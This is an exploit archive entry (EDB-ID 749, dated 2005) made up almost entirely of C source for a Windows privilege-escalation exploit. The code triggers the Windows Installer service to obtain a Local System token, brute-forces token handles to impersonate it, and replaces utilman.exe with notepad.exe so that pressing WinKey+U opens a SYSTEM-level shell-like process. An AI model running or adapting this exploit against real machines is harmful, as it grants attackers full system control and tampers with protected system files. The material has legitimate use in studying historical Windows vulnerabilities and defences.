Microsoft Windows - Improper Token Validation Privilege Escalation

EDB-ID:

749




Platform:

Windows

Date:

2005-01-11


/* Removed #include "stdafx.h" / str0ke */

#include <stdio.h>
#include <windows.h>

#define INFO_BUFFER_SIZE MAX_COMPUTERNAME_LENGTH + 1
#define PATH_SIZE INFO_BUFFER_SIZE + MAX_PATH + 4
typedef UINT (WINAPI* PFnMsiInstallProduct)(LPCSTR szPackagePath, LPCSTR szCommandLine);


int main(int argc, char* argv[])
{
HANDLE hToken,hThread;
HMODULE hMsi = 0;
CHAR infoBuf[INFO_BUFFER_SIZE];
DWORD bufCharCount = INFO_BUFFER_SIZE;
CHAR file1[PATH_SIZE]="\\\\";
CHAR file2[PATH_SIZE]="\\\\";
CHAR file3[PATH_SIZE]="\\\\";

//Get name of the computer. 
GetComputerName(infoBuf, &bufCharCount);

hThread=GetCurrentThread();
hMsi = LoadLibrary("msi.dll");

//Invoke windows installer service in order to steal a Local System account identity token.
//Curious? some internal LPC magic here, see *1*
PFnMsiInstallProduct MsiInstallProduct = 0;
MsiInstallProduct = (PFnMsiInstallProduct)GetProcAddress(hMsi, "MsiInstallProductA");
MsiInstallProduct("","");

//Get Local System account identity token and set it to current thread
hToken=(void*)0x1;
while(SetThreadToken(&hThread,hToken)==NULL){
hToken=(void*)((int)hToken+1);
}

strcat(file1,infoBuf);
strcat(file1,"\\C$\\winnt\\system32\\utilman.exe");

strcat(file2,infoBuf);
strcat(file2,"\\C$\\winnt\\system32\\utilmanback.exe");

strcat(file3,infoBuf);
strcat(file3,"\\C$\\winnt\\system32\\notepad.exe");

//Replace Utility Manager with Notepad impersonating Local System account
//BTW: fuck Windows file protection :)
if(!CopyFile(file1,file2, TRUE))
printf("CopyFile() failed: %d\n", GetLastError());
else
if(!CopyFile(file3,file1, FALSE))
printf("CopyFile() failed: %d\n", GetLastError());
else {
printf("\nPress WinKey+U to run Notepad as Local System\n");
printf("Remember to restore original utilman.exe from utilmanback.exe\n");
}

Sleep(5000);
return 0;
}

// milw0rm.com [2005-01-11]